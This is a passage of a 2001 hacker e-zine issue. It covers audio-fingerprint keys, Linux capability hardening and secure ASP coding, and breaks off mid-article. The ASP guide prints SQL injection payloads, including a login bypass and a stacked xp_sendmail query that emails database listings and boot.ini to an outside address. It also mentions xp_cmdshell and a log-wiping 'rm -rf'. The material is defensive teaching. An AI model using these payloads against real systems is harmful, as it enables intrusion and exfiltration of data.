infosurge Issue 08

Published in infosurge

..... ..........................[_]
::: ::: ::: ....... :
.... ........ ::: ........ :::..... ... .... ........ ........ ........
::: ::: :::: ::::: ::: :::: .. :::: ::: :::: ::: :::: ::::.::: :::.::::
.::: ::: :::: ::: :::.:::: :::.:::: :::.:::: ::: .... ::: :::.....
: ::::.:::
..:[ issue 8 ]:.......:
................:
:
.......[ ]...............................................
: :
: Official Web Site - http://infosurge.rendrag.net :
: :
: Official Submissions - phase5@cmdrkeen.net :
: Issue Editor - lym@thepentagon.com :
: :
:..[_].............................................[_]..:
: Issue #8: 02/03/2001 :
: :.
:.:[ ] infosurge - we put the leet in obsolete :
.:
.............................................:
:
......[ ]......................................................................
: :
: Contents Author :
: ---------- -------- :
: :
: #01 Using digital audio fingerprints in encryption - jestar :
: #02 Hardening a Linux system with Capabilities - fyre :
: #03 Secure Web Applications On Windows NT with ASP - black-hand :
: #04 An automated process killer for Linux (in C) - icebsd :
: #05 Phone extension warning device - Black_Smurf :
: #06 UNIX Security - lymco :
: #07 Example configuration of an OpenBSD firewall - aphex :
: #08 History of 3d acceleration - Maticles :
: :
: TOTAL - 99kb :
: :
:..........................................................[_]................:
:
.......:
:
....................................................[ ].......................
: :
: #01 Using digital audio fingerprints in encryption - jestar :
: ---------------------------------------------- :
:.[_]........................................................................:
:
...:
:
: Ok, it's been a while since I've written anything and I honestly don't
: know if this is being pursued or has been written up by anyone else but
: a quick search and also my research on fingerprinting schemes didn't turn
: anything up. I'm crapping on, so to cut it short this is my disclaimer
: and if I'm stealing any ideas you've already thrown out to the world I can
: assure you I didn't know, if you wanna pursue me any further than that I
: suggest fucking off.
:
: Ok onto the article. Just recently I was putting a bit of thought into
: the current encryption schemes out there and on key distribution as well
: as key generation and I remember seeing on a news site that there was
: a group of people working on an algorithm that would boil any audio
: file down to a digital signature representing that piece of audio.
: This signature would be unique to each song, but not to each recording
: of that song. What that means is that if you were using a song, the
: fingerprint created from an audio file taken from the radio *should*
: be identical to one created from a cd. Whether this turns out to be
: true is another matter altogether. The group in question is TunePrint
: (www.tuneprint.com) I guess if you're interested you probably want to take
: a gander at the site now before continuing with the article.
:
: Here's the idea. You take your plaintext message and think "well, I want
: to send this to mum but I don't want the NSA peeking at it" (I'm sure
: we all like to send heavily encrypted shopping lists to our mothers)
: so you decide to encrypt it (that'll foil them *cough*). Now currently
: you would probably use some sort of public/private key deal which is
: all well and good, but there's still the matter of key transfers etc. So
: say instead you decide to take a fingerprint of your mum's favourite
: song (probably something by the rolling stones or an 80's hair band,
: unless you're phase in which case it's probably 'i sucked a lot of cock to
: get where i am' by regurgitator) and you use the generated fingerprint
: to encrypt the message. You then send the ciphertext to your mum and a
: few days later phone her up and tell her what song it was encoded with
: using some ultra cool oh no black helicopters and sunnies covert message,
: probably "i really like this new song ...... you should listen to it".
: She knows this is the key now and creates a fingerprint which she then
: uses to decode it. Whether or not she then has to eat the fingerprint,
: audio file and plaintext message is up to you.
:
: Of course there's a few problems with the idea put forward here, the
: main one being that the digital fingerprinting tech in question could
: be vapourware, or may not end up being as robust as they are hoping,
: making variance in fingerprints too great to actually be useful. Also it
: would require previous setting up of the way to let the other party know
: what audio was used, but once again, I'm just throwing out some ideas I
: had. If you have any comments or suggestions, or just want to tell me I'm
: dreaming drop me a line at jestar@rendrag.net and all messages will be
: given the appropriate attention (take that as you will).
:
:....
:
...[ ]........................................................................
: :
: #02 Hardening a Linux system with Capabilities fyre :
: ---------------------------------------------- :
:.[_]........................................................................:
:
...:
:
: Introduction
: ============
:
: Linux 2.2[1] introduced an important new security feature called
: `capabilities', which, if used properly, can both reduce the dependence of
: some programs on root privileges and make the superuser far less powerful
: than they would be on a traditional UNIX system.
:
: In this article, we're going to discuss how to use capabilities to harden
: a Linux system; that is, assume there are going to be vulnerabilities and
: work out a way to reduce the damage potentially caused by them.
:
:
: [1] It was Linux 2.1 that introduced capabilities, but 2.2 was the first
: stable series to include them, and the bounding capability set idea took
: until .11 to make it in.
:
:
: Capability List
: ===============
: To whet your appetite with what capabilities can do, here's a list of the
: capabilities supported by Linux 2.4.1 (the current stable kernel as of
: this writing):
:
: Name Meaning
: --------------- ---------------------------------------------------
: CAP_CHOWN Allow changes to user and group ownership of files.
: CAP_DAC_OVERRIDE Override all DAC restrictions.
: CAP_DAC_READ_SEARCH Override all read/search DAC restrictions.
: CAP_FOWNER Override all restrictions about file ownership
: CAP_FSETID Allow setting the setuid/setgid bits on files whose
: owner or group does not match the caller.
: CAP_KILL Override restrictions on sending signals to
: processes not owned by the current effective user id.
:
: CAP_SETGID Allows setgid(), setgroups(), etc.
: CAP_SETUID Allows setuid().
: CAP_SETPCAP Allows transfer/removal of capabilities from
: current process to another process.
:
: CAP_LINUX_IMMUTABLE Allow modification of immutable (+i) and
: append-only (+a) ext2 filesystem attributes.
:
: CAP_NET_BIND_SERVICE Allow binding TCP and UDP sockets to port numbers
: below 1024.
:
: CAP_NET_BROADCAST Allow broadcasting.
: CAP_NET_ADMIN Misc. network admin functions, most notably setting
: promisc. mode.
:
: CAP_NET_RAW Allow use of raw sockets.
: CAP_IPC_LOCK Allow locking of shared memory segments, and
: disabling paging.
:
: CAP_IPC_OWNER Override IPC ownership checks.
: CAP_SYS_MODULE Insert/remove kernel modules, modify bounding cap.
: set.
:
: CAP_SYS_RAWIO ioperm/iopl access, USB.
: CAP_SYS_CHROOT Allow the chroot system call.
: CAP_SYS_PTRACE Allow ptrace of any process.
: CAP_SYS_PACCT Allow control of process accounting.
: CAP_SYS_ADMIN Misc. admin features, including mount, setting host
: and domain names, random device, disk quotas, other
: hardware config changes.
:
: CAP_SYS_BOOT Allow system reboot, halt, etc.
: CAP_SYS_NICE Allow raising priority of this and other processes.
: CAP_SYS_RESOURCE Override resource limits, disk quotas, etc.
: CAP_SYS_TIME Allow setting of system clock.
: CAP_SYS_TTY_CONFIG TTY device configuration.
: CAP_MKNOD Allow special files to be created.
: CAP_LEASE Allow taking leases on files.
:
: 2.2 series kernels seem to support all of these capabilities, with the
: exception of CAP_LEASE, which is new for 2.4. An up-to-date list of
: capabilities with brief descriptions is usually available in
: /usr/include/linux/capability.h.
:
:
: Bounding Sets
: =============
:
: Linux 2.2.11 introduces the concept of `bounding capability sets', which
: can be used to remove certain capabilities so that no process can use
: them, not even ones owned by the superuser. The only way to get the
: capabilities back[2] is to reboot. This feature can be used to limit what
: a cracker can do if they somehow get root on your system.
:
: Some examples:
: * Stop script kiddies clobbering your system logs (as is their habit) by
: making the log files append-only (chattr +a) and removing the
: CAP_LINUX_IMMUTABLE capability.
: * Stop LKM rootkits from functioning by disabling CAP_SYS_MODULE.
: * Stop sniffers being run on a compromised machine by removing
: CAP_NET_ADMIN and perhaps CAP_NET_RAW.
:
: The command most often used to manipulate the bounding capability set is
: lcap, written by spoon@ix.netcom.com. It's available in source and RPM
: formats from http://home.netcom.com/~spoon/lcap/download/. If you're
: using the current unstable dist of Debian (sid), you should be able to
: use apt-get in the usual way to install lcap. The examples in this article
: assume lcap 0.0.3, but any later version will do.
:
: To use lcap, type 'lcap' followed by the name or names of capabilities you
: want to remove. For example:
: # lcap CAP_NET_RAW
: will remove the raw socket capability, breaking ping, traceroute and
: tcpdump among others, even for the superuser. But before you start
: playing with lcap yourself, read on for some potential pitfalls and tips.
:
: The most common place to modify capabilities is in your init scripts,
: after all privileged daemons have been launched and the hardware
: configured. I run lcap from rc.local right after tuning my hard drive
: parameters with hdparm (which requires hardware access). I shouldn't need
: to point it out, but don't experiment with capabilities on production
: machines. Chances are something will go wrong and you'll be forced to
: reboot (or worse!).
:
: There are a number of common problems encountered by those using bounding
: capabilities, and the nastiest of these usually show up when shutting
: down or rebooting the system. Removing CAP_SYS_ADMIN, for example, will stop
: you being able to unmount the filesystems, potentially resulting in
: corruption or other damage. If CAP_SYS_BOOT is removed, the system will
: refuse to reboot or power down. This may cause damage on some hardware,
: but not unmounting the filesystems may be worse. Don't play with
: capabilities on production machines, or bad things may happen.
:
:
: [2] Only if the right capabilities are set. Patrick Reynolds demonstrates
: in a post to Bugtraq entitled "Linux capability bounding set weakness" how
: to get capabilities back if CAP_SYS_RAWIO and CAP_SYS_MODULE are not
: disabled. As he suggests, you should always remove these capabilities if
: you've removed any others.
: (Ref: http://archives.neohapsis.com/archives/bugtraq/2000-06/0276.html)
:
:
: In Practice: Securing the Log Directory
: =======================================
:
: In this example, we'll make it so that even the superuser cannot do
: anything but append to the system logs - once a message is logged, it's
: very difficult to remove it (at least from a remote machine).
:
: To begin with, we make our log files append-only with the chattr command:
: # chattr +a /var/log/*
:
: Then, we make the /var/log directory immutable (ie. no changes are
: allowed):
: # chattr +i /var/log
:
: Finally we remove the CAP_LINUX_IMMUTABLE capability from the kernel's
: bounding set, which is what allows the +a/+i bits on files to be changed,
: and with it the two capabilities that must always go whenever anything
: else is removed (see the footnote in the previous section for why):
: # lcap CAP_LINUX_IMMUTABLE CAP_SYS_RAWIO CAP_SYS_MODULE
:
: We're all done. If you didn't encounter any errors while executing the
: above commands, your log files should be fairly well protected. Try
: removing one to make sure it's not possible, then try using logger(1) to
: log a message to make sure syslogd can still write to the log files.
:
: Two things to watch for. The glob in the chattr command doesn't descend
: into subdirectories (e.g. /var/log/httpd), so apply +a there as well if
: you want those logs covered. And /var/log/lastlog is not really a log:
: login rewrites it in place at a per-user offset rather than appending,
: so +a will stop last-login times being recorded; leave that file out of
: the +a set.
:
: Note: making /var/log immutable and the files in it append-only breaks the
: log rotation features present in many Linux distributions. I don't know
: any (secure) way around this.
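:
: The following is an added example (not from this article and not part of
: lcap) that shows what the lcap line above does to the kernel's bounding
: set. On 2.2.11+ and 2.4 kernels the set lives in /proc/sys/kernel/cap-bound
: as a signed 32-bit decimal; the usual default is -257, which is every
: capability except CAP_SETPCAP. The script decodes that number, predicts the
: value after a given lcap command and applies the two rules from this
: article: CAP_SYS_RAWIO and CAP_SYS_MODULE must go with everything else,
: and CAP_SYS_ADMIN/CAP_SYS_BOOT should stay if you want a clean shutdown.
: The bit numbers are the CAP_* values from the 2.4 capability.h.

```python
"""Decode and sanity-check a Linux 2.2.11+/2.4 capability bounding set.

Added example, not code from the article or from lcap.  On those kernels
the bounding set is exposed in /proc/sys/kernel/cap-bound as a *signed*
32-bit decimal (the usual default is -257: everything except CAP_SETPCAP),
and lcap only ever clears bits in it.  The bit numbers are the CAP_* values
from /usr/include/linux/capability.h of the 2.4 series.
"""
import os

CAP_BITS = {
    "CAP_CHOWN": 0, "CAP_DAC_OVERRIDE": 1, "CAP_DAC_READ_SEARCH": 2,
    "CAP_FOWNER": 3, "CAP_FSETID": 4, "CAP_KILL": 5, "CAP_SETGID": 6,
    "CAP_SETUID": 7, "CAP_SETPCAP": 8, "CAP_LINUX_IMMUTABLE": 9,
    "CAP_NET_BIND_SERVICE": 10, "CAP_NET_BROADCAST": 11, "CAP_NET_ADMIN": 12,
    "CAP_NET_RAW": 13, "CAP_IPC_LOCK": 14, "CAP_IPC_OWNER": 15,
    "CAP_SYS_MODULE": 16, "CAP_SYS_RAWIO": 17, "CAP_SYS_CHROOT": 18,
    "CAP_SYS_PTRACE": 19, "CAP_SYS_PACCT": 20, "CAP_SYS_ADMIN": 21,
    "CAP_SYS_BOOT": 22, "CAP_SYS_NICE": 23, "CAP_SYS_RESOURCE": 24,
    "CAP_SYS_TIME": 25, "CAP_SYS_TTY_CONFIG": 26, "CAP_MKNOD": 27,
    "CAP_LEASE": 28,
}
MASK32 = 0xFFFFFFFF
CAP_BOUND_PATH = "/proc/sys/kernel/cap-bound"


def parse_cap_bound(text):
    """Signed decimal as printed by the kernel -> unsigned 32-bit mask."""
    return int(text.strip()) & MASK32


def format_cap_bound(mask):
    """Unsigned mask -> the signed decimal form cap-bound would show."""
    mask &= MASK32
    return str(mask - (1 << 32) if mask & (1 << 31) else mask)


def dropped(mask):
    """Names of capabilities absent from the bounding set, in bit order."""
    return [n for n, b in sorted(CAP_BITS.items(), key=lambda kv: kv[1])
            if not mask & (1 << b)]


def apply_lcap(mask, names):
    """Predict the bounding set after 'lcap NAME [NAME...]' (bits only go away)."""
    for name in names:
        if name not in CAP_BITS:
            raise ValueError("unknown capability: " + name)
        mask &= ~(1 << CAP_BITS[name]) & MASK32
    return mask


def audit(mask):
    """Warnings about a weak or self-defeating bounding set (rules from the article)."""
    gone = set(dropped(mask))
    warnings = []
    # Footnote [2]: with CAP_SYS_RAWIO (/dev/kmem) or CAP_SYS_MODULE (load a
    # module) still available, root can put the other bits back without a reboot.
    if gone - {"CAP_SETPCAP"}:
        for must in ("CAP_SYS_RAWIO", "CAP_SYS_MODULE"):
            if must not in gone:
                warnings.append(must + " still present: bounding set can be restored")
    # Dropping these breaks a clean shutdown (umount / reboot).
    for risky in ("CAP_SYS_ADMIN", "CAP_SYS_BOOT"):
        if risky in gone:
            warnings.append(risky + " dropped: shutdown/umount will fail")
    return warnings


if __name__ == "__main__":
    if os.path.exists(CAP_BOUND_PATH):
        with open(CAP_BOUND_PATH) as f:
            current = parse_cap_bound(f.read())
        print("current bounding set %s drops %s" % (format_cap_bound(current), dropped(current)))
    else:
        current = parse_cap_bound("-257")  # constructed: the usual 2.4 default
        print("no cap-bound on this kernel, assuming the 2.4 default -257")
    planned = apply_lcap(current, ["CAP_LINUX_IMMUTABLE", "CAP_SYS_RAWIO", "CAP_SYS_MODULE"])
    print("after the log-directory lcap line: %s drops %s" % (format_cap_bound(planned), dropped(planned)))
    for w in audit(planned):
        print("warning:", w)
```

: Run it after your rc.local lcap line to confirm the bits are really gone;
: on a kernel without cap-bound it falls back to the -257 default and just
: shows what the planned command would do.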
:
:
: Conclusion
: ==========
:
: Although the current Linux capabilities implementation is far from
: perfect, it definitely does `raise the bar', and may confuse and deter
: unskilled crackers (our friends the script kiddies). The look on Joe
: Haxor's face when he tries the script kiddie staple command `rm -rf
: /var/log' and it fails would be priceless.
:
:....
:
...[ ]........................................................................
: :
: #03 Secure Web Applications On Windows NT with ASP - black-hand :
: ------------------------------------------------ :
:.[_]........................................................................:
:
...:
:
: By black-hand black.wiretapped.net
:
: ASP (Active Server Pages) is a server-side scripting environment developed
: by Microsoft for IIS servers on Windows operating systems. ASP is used to
: create dynamic web pages and is the glue between components in creating
: large web-based applications. By default, IIS hands every file with the
: .asp extension to the ASP script engine, which runs the server-side code
: before the result is sent to the client. ASP can mix several scripting
: and markup languages in one page, and can call technologies such as COM
: and Java. The default scripting language in ASP pages is VBScript, a
: scripting language based upon Visual Basic.
:
: Using ASP, it is possible to generate very flexible, dynamic and large
: web based applications, integrating backend web processing and storage
: with client-side (front-end) scripting and HTML.
:
: The level of security in an ASP application or web site is dependent upon
: the developer. Beyond its request logs, IIS has no built-in mechanism to
: audit or monitor intrusions or misuse of a web-based application. A
: security audit of the code should be carried out as part of the testing
: and debugging procedure of a project. This paper aims to outline common
: mistakes in ASP programming that an attacker can use to compromise system
: data, and how to develop good programming and administration practices to
: defend against these attacks.
:
: This document will assume that you have some knowledge of basic scripting
: and/or ASP pages.
:
:
: Basic ASP
: ---------
:
: When deciding upon what tool to use to develop a project, an ASP
: developer is faced with a number of choices. Larger IDE's (Integrated
: Development Environments) take a lot of the work out of writing ASP, as
: common functions and procedures can be dropped into the project easily
: (such as tables, database connections etc.). A more 'purist' approach
: would be to use a simple text editor and other individual programs to
: assist in the development process. There are advantages and disadvantages
: associated with either, and it is usually up to the developer to make
: their own decision based on what they are comfortable with.
:
: The following is a basic ASP page:
:
: <html>
: <body>
: <%
: response.write "Hello world"
: %>
: </body>
: </html>
:
: The above script should produce the words "Hello world" printed on the
: screen. The following HTML would have been produced by the server and
: sent to the client.
:
: <html> <body> Hello world </body> </html>
:
: So what happened? The client requested an ASP script, IIS passed the
: script to the ASP engine, and the engine interpreted everything between
: the <% %> tags. These are the ASP opening and closing tags; by default
: everything between them in an ASP script is interpreted as VBScript. The
: VBScript code then called the Write method of the Response object, which
: sends its argument ("Hello world") back to the client. No part of the
: server-side script is seen by the client - the client only sees the
: output of the operations conducted on the server.
:
: Scripting can be used on the server side to make output dynamic. An
: example would be content for a site being extracted from an SQL server,
: or from a file. Another example would be to increment a counter each time
: a page is fetched, so that records of numbers of visitors to that site
: can be maintained.
:
: The following script will print a loop
:
: <html>
: <body>
: <% for x=1 to 10 %>
: Printing this text <%=x%><br>
: <% next %>
: </body>
: </html>
:
: This will produce the following output to the browser
:
: Printing this text 1
: Printing this text 2
: Printing this text 3
: ..
:
: From that example we can see that there can be multiple blocks of
: server-side code within an ASP script, and that a single control
: structure (here the for loop) can span several of them, with plain HTML
: in between. Printing the variable x was achieved by writing the
: variable with an = sign immediately after the opening script tag;
: <%=x%> is shorthand for <% response.write x %>.
:
:
: User Input
: ----------
:
: The previous example pages were rather dull. To make a page more
: interactive would require input from the user on the client-side. The
: requirements for user input are a client-side HTML form to pass data to our
: ASP script, and then the server-side code within the ASP script that will
: then process it. Web-based forms are a popular method to obtain information
: from users. A simple example of a HTML page with a form follows here:
:
: <html>
: <body>
: <form action=login.asp>
: Username: <input type=text name=username><br>
: Password: <input type=password name=password><br>
: <input type=submit value=Login><br>
: </form>
: </body>
: </html>
:
: That HTML will produce a simple login screen that will submit the values
: of the two fields (username and password) to the login.asp script when the
: "Login" button is pressed. The form has no method attribute, so the browser
: submits it with GET and the password ends up in the URL, the browser
: history and the server's request logs; a real application should use
: method=post and read the fields with request.form instead of
: request.querystring. The GET version is used here because it keeps the
: examples short.
:
: With login.asp, we have to be able to accept this input into the script,
: and react accordingly. The inputs into the script are the username and
: password entered by the user at the previous HTML page, and the output
: is either going to be "access allowed" or "access denied" depending on
: the username and password combination entered.
:
: Firstly, the user input is taken into the ASP script and stored in
: variables using the request.querystring collection.
:
: <%
: Dim uname, pass ' declare variables
:
: uname = request.querystring("username")
: pass = request.querystring("password")
:
: This will take the values passed to the script from the HTML form and
: place them into the uname and pass variables respectively. Secondly, we
: decide based on the value of these variables what output we are going to
: produce and inform the user.
:
: if uname = "user" and pass = "pass" then
:   response.write "access allowed"
: else
:   response.write "access denied"
: end if
: %>
:
: If the passed in username is "user", and the password is "pass", then the
: user will be informed that their login was allowed, otherwise that
: their login was denied. Of course, after being shown that the user has
: logged in, they will proceed through to a members or otherwise normally
: restricted section of the site, and users whose login was denied will be
: redirected back to the main HTML login screen to attempt again.
:
:
: File Access
: -----------
:
: The FileSystemObject object allows access to files stored on the
: server. The following example will write a file to the system. Note
: that it is writing the file to the server drive, not to the drive of the
: client connecting.
:
: <%
: Dim fso, test
: Set fso = CreateObject("Scripting.FileSystemObject")
: Set test = fso.CreateTextFile("c:\testfile.txt", True)
: test.WriteLine("This is a test.")
: test.Close
: %>
:
: If you open testfile.txt in a text viewer, you should be able to see the
: "This is a test." line that we wrote to it.
:
: Reading files is also very similar, we can read the file line by line or
: character by character and store it into variables to use the data.
:
: Const ForReading = 1 ' the FSO constants are not predefined in ASP
: Dim fso, f, test
: Set fso = CreateObject("Scripting.FileSystemObject")
: Set f = fso.OpenTextFile("c:\testfile.txt", ForReading)
: test = f.Read(5)
: f.Close
:
: The variable "test" will contain the first 5 characters of the testfile.txt
: file.
:
: The FileSystemObject can also be used to add, change, move, create and
: delete files and folders. This ability makes the FileSystemObject very
: powerful and useful.
:
:
: Database Access
: ---------------
:
: Databases are used to store data in an organized manner, making it easier
: and faster to store and retrieve records. In VBScript there are a number
: of data access methods, with the most common for server-side access being
: Microsoft ADO (ActiveX Data Objects).
:
: Using ADO, you can dynamically create an object to store, manipulate and
: navigate through data returned from a database.
:
: The following code creates an ADO connection, and then opens a recordset
: on that connection (VBScript has no "Dim x As New" syntax; objects are
: created with CreateObject and assigned with Set):
:
: Dim connection, recordset
: Set connection = CreateObject("ADODB.Connection")
: connection.Open ConnectionString, UserID, Password
:
: Set recordset = CreateObject("ADODB.Recordset")
: recordset.Open Source, connection, CursorType, LockType
:
: The "source" option in the recordset defines the SQL query set to be
: returned into the object. We can then iterate through the returned
: recordset, and manipulate the data. The following example will print a
: single field from each record on a line from a returned recordset:
:
: set RECORDSET = CreateObject("ADODB.RecordSet")
: RECORDSET.ActiveConnection = "ODBCCONNECTION"
: RECORDSET.CursorType = 0
:
: RECORDSET.source = "select field from table"
:
: RECORDSET.Open
: If Not RECORDSET.EOF then
:   Do Until RECORDSET.EOF
:     Response.write RECORDSET("field") & "<br>"
:     RECORDSET.MoveNext ' without this the loop never ends
:   Loop
: end if
: RECORDSET.Close
:
:
:
: Securing User-Supplied Input
: ----------------------------
:
: In a previous example, we saw a simple demonstration of an ASP script
: handling a login screen and authenticating a user. Very rarely would you
: see an example in the real world that functions in the same way. A more
: stable and secure solution would have to check the user input passed
: as well as accounting for a lot of other factors.
:
: An attacker can manipulate the data passed to the script so that unexpected
: events occur. An "unexpected event" can be used by an attacker to access
: a restricted "members" sections, or to access database information.
:
: The following is a typical script used to handle logins by querying a
: database to extract username/password information:
:
: Dim uname, pass
:
: uname = request.querystring("username")
: pass = request.querystring("password")
:
: set LOGIN = CreateObject("ADODB.RecordSet")
: LOGIN.ActiveConnection = "ODBCCONNECTION"
: LOGIN.CursorType = 0
:
: LOGIN.source = "select * from users where uname='" & uname & "' and " & _
:                "pass='" & pass & "'"
:
: LOGIN.Open
: If LOGIN.BOF = True or LOGIN.EOF = True then
:   response.redirect "default.asp" ' failed login
: else
:   response.redirect "members.asp" ' logged in
: end if
: LOGIN.Close
:
:
: The username and password parameters are inserted into an SQL query,
: and then the results of this query are returned into a recordset.
: If the username and password are found, the recordset holds the full
: record for that user. If the combination is not found, the recordset
: is empty. The if statement checks whether a record was returned: a
: non-empty recordset means the username and password combination
: matched a record, otherwise it did not match a valid user record.
:
: A successful login will redirect the user to the members.asp page, a failed
: login will redirect the user to default.asp. The username and password
: parameters are passed to the ASP script via a web form, or manually passed
: to the script by appending variable names and values to the URL.
:
: http://www.server.com/login.asp?username=kevin&password=test123
:
: The above example will pass the values "kevin" and "test123" as the
: username and password, and these values will be directly stored into our
: server side variables.
:
: The script then takes the values that are passed and inserts them
: directly into the SQL query, meaning that we are able to pass the script
: values that directly modify the SQL query that is executed.
:
: As an example, we will pass the following to the script, and then
: investigate how the SQL is executed and what result is produced:
:
: username: 1
: password: 1' or pass <> '1
:
: The code used to construct the SQL query is as follows:
:
: "select * from users where uname='"&uname&"' and pass='"&pass&"'"
:
: If the query is then constructed with the variables that we are passing
: in, the following query will be executed (our two inputs are the 1 after
: uname= and everything after pass=):
:
: select * from users where uname='1' and pass='1' or pass <> '1'
:
: Because of the password we supplied, the query returns every record in
: the table, which lets us into members.asp without a real username or
: password. AND binds tighter than OR, so the WHERE clause means "(uname is
: 1 and pass is 1) or pass is not 1": the first part matches nothing, but
: the second part matches every user whose password is not '1', which in
: practice is every record in that table.
:
: Microsoft SQL Server also accepts several statements in one batch, so in
: the previous example, with a bit of tinkering, we can INSERT new records
: or DELETE records. As a more complex example, Microsoft SQL Server comes
: with extended stored procedures, one of which (xp_sendmail, when SQL Mail
: is configured) will email the result of an SQL query to an email address.
: Passed in the password field, the following runs as part of the whole
: query: the leading 1' closes the string the script opened, the semicolon
: starts a new statement, and the trailing -- comments out the closing
: quote the script appends.
:
: 1'; EXECUTE master.dbo.xp_sendmail 'suspects@2600.org.au', '',
:     'select * from sysdatabases', 'C:\boot.ini' --
:
: Passing those parameters to the stored procedure will email the results
: of the query "select * from sysdatabases" to suspects@2600.org.au. As an
: extra bonus, xp_sendmail lets you attach any file the SQL Server service
: account can read; in the above example we have attached c:\boot.ini to
: the email. sysdatabases is a system table that contains the names and
: information of all databases on the SQL server, which can come in handy.
: Further investigation into the system databases and stored procedures
: installed by default with Microsoft SQL Server will turn up more
: possibilities, such as changing permissions and executing commands on
: the server (xp_cmdshell).
:
:
: Filtering Input
: ---------------
:
: As a solution to unexpected passed input, we can develop a function to
: wrap around variables containing user input to filter out characters that
: are deemed "unnecessary" or dangerous.
:
: The following function strips everything except letters and digits from
: the passed input (the character class must be negated and the Global
: flag set, otherwise only the first match would be replaced):
:
: Function SQLFilter(str)
:   Dim regEx
:   Set regEx = New RegExp
:   regEx.Pattern = "[^A-Z0-9]" ' anything that is not a letter or digit
:   regEx.IgnoreCase = True
:   regEx.Global = True         ' replace every match, not just the first
:   SQLFilter = regEx.Replace(str, "")
: End Function
:
: Filtering like this is lossy: a password containing spaces or punctuation
: can no longer be entered at all, and a list of "bad" characters is easy to
: get wrong. At a minimum, double any single quote in a value before putting
: it into a string literal (Replace(str, "'", "''")); better still, keep user
: data out of the SQL text altogether by passing it as parameters of an
: ADODB.Command object. The database login used by the web application
: should also have no rights to the master database or the xp_* extended
: procedures, so that a mistake in one page does not hand over the server.
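:
: An added example, not from this article: the login query above run two
: ways against an in-memory SQLite table of constructed users, to show
: exactly why 1' or pass <> '1 gets in, what the ' -- trick does, and how a
: parameterised query and the filter stop it. Python and SQLite stand in
: for VBScript/ADO and SQL Server because the bug is in how the query text
: is built, not in the language; SQLite refuses to run two statements in one
: call, so the stacked ; EXECUTE ... trick from the previous section cannot
: be shown with it (SQL Server accepts such batches).

```python
"""SQL injection in the login query, demonstrated end to end.

Added example, not code from the article: Python and an in-memory SQLite
table stand in for VBScript/ADO and SQL Server, because the bug lives in
how the query text is built, not in the language.  The users table and
its two rows are constructed here.  SQLite will not run two statements in
one execute() call, so the stacked "; EXECUTE ..." trick from the article
cannot be shown here; it works against SQL Server, which accepts batches.
"""
import sqlite3


def make_db():
    """Constructed sample data: two users with plaintext passwords, as in the article."""
    con = sqlite3.connect(":memory:")
    con.execute("create table users (uname text, pass text)")
    con.executemany("insert into users values (?, ?)",
                    [("kevin", "test123"), ("alice", "s3cret")])
    return con


def login_concat(con, uname, pw):
    """The article's pattern: user input glued straight into the SQL text."""
    sql = ("select * from users where uname='" + uname +
           "' and pass='" + pw + "'")
    return con.execute(sql).fetchall()


def login_param(con, uname, pw):
    """The fix: the values travel as parameters and never touch the SQL text."""
    sql = "select * from users where uname=? and pass=?"
    return con.execute(sql, (uname, pw)).fetchall()


def sql_filter(s):
    """What the article's SQLFilter is meant to do: keep only A-Z, a-z, 0-9."""
    return "".join(ch for ch in s if ch.isascii() and ch.isalnum())


def escape_quotes(s):
    """Minimal alternative for strings you must embed: double every single quote."""
    return s.replace("'", "''")


if __name__ == "__main__":
    con = make_db()
    payload = "1' or pass <> '1"           # the article's password payload
    print("concat, real creds  :", login_concat(con, "kevin", "test123"))
    print("concat, payload     :", login_concat(con, "1", payload))
    print("concat, kevin' --   :", login_concat(con, "kevin' --", "whatever"))
    print("param,  payload     :", login_param(con, "1", payload))
    print("concat, filtered    :", login_concat(con, "1", sql_filter(payload)))
    print("concat, quotes x2   :", login_concat(con, "1", escape_quotes(payload)))
```

: The concatenated version returns both users for the payload and logs in
: as kevin for kevin' --; the parameterised version returns nothing for
: either, because the whole string is compared as a value. The filter and
: the quote-doubling both defuse this particular payload, but only the
: parameterised query does so without guessing which characters matter.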
:
:
: IIS Security Holes
: ------------------
:
: There are a number of generic IIS security holes that could assist an
: attacker in compromising a remote database and system. Several of them
: can be used to view the full source of server-side scripts, so a
: developer should never assume that the script source is secret when
: developing a site or application.
:
: Common mistakes include servers hosting sample scripts and directories,
: or running versions of remote data access and IIS services that are known
: to contain security holes.
:
: These holes are common and are discussed in my IIS security article
: located at:
:
: http://black.wiretapped.net/iis.txt
:
:
: More Programming Errors
: -----------------------
:
: It is common for a developer to include test and debug modes in
: applications for development and debugging purposes, protected only by
: the fact that in a production environment a remote user is not supposed
: to be able to view the server-side code.
:
: One such example is an online store that had a debug mode for testing
: purposes that allowed a user to specify a discount on a product and view
: debug information, such as SQL statements. Enabling the debug mode was
: as simple as passing the variable "debug" equal to 1, as such:
:
: http://www.server.com/shop.asp?productid=435&debug=1
:
: This was uncovered by using an IIS security hole to view and analyze
: the source to the ASP scripts. At the top of the ASP script there was
: something similar to
:
: <%
: Dim debug
: debug = request.querystring("debug")
:
: [..]
:
: if debug = 1 then
:   response.write RECORDSET.Source
: end if
: %>
:
: Programming errors like this are common and can lead to interesting
: finds by curious and persistent web surfers.
:
: Other possibilities include scanning for backups of server side scripts
: by appending common backup extensions to filenames. It is common for
: some development environments and editors to create backups of files,
: or for administrators to manually create backups before making changes.
:
: An example would be UltraEdit's (www.ultraedit.com) default practice of
: creating a copy of each open file with a .bak extension. Since IIS has no
: script mapping for the .bak extension, a request for the backup file is
: served as a plain text document, server-side source and all.
:
: A document on this is available on my website at:
:
: http://black.wiretapped.net
:
:
: Session State
: -------------
:
: Once a user has logged in, it is important to track the status and
: permissions of each user on the server side. There are a number of methods
: that can be used to do this, including cookies, IIS authentication, or
: server side session value storage. At a simple level, keeping track of
: session state could simply mean checking a Boolean value to see if the
: requesting user has permissions to that resource.
:
: On login, the application would set a Boolean value to true If the login
: was sucessful:
:
: LOGIN.Open
: If LOGIN.BOF = True or LOGIN.EOF = True then
:   session("logged") = 0
:   response.redirect "default.asp" ' failed login
: else
:   session("logged") = 1
:   response.redirect "members.asp" ' logged in
: end if
: LOGIN.Close
:
: A successful login would set the server-side variable "logged" to one. A
: fresh set of server-side session variables is created for each user, and
: they are tied to the browser by a session ID cookie generated by the
: server, a unique and random 64-bit string, which makes hijacking another
: user's session difficult (assuming that the random number generation used
: by IIS is "random enough").
:
: When access permission to a restricted resource or differentiation between
: different levels of user is required, we simply read out the value stored
: in this session variable.
:
: Such an example would be to make a simple check at the top of a page that
: the developer wishes to restrict access to.
:
: <% if session("logged") <> 1 then
: response.redirect "default.asp?error=login"
: end if
: %>
:
: If the session variable "logged" had been set to 1 during login time,
: then access to the rest of the script would be allowed, otherwise the
: request would be redirected to the default page and an error recorded.
:
: This method prevents "backdoor" / "deep linked" access to parts of a
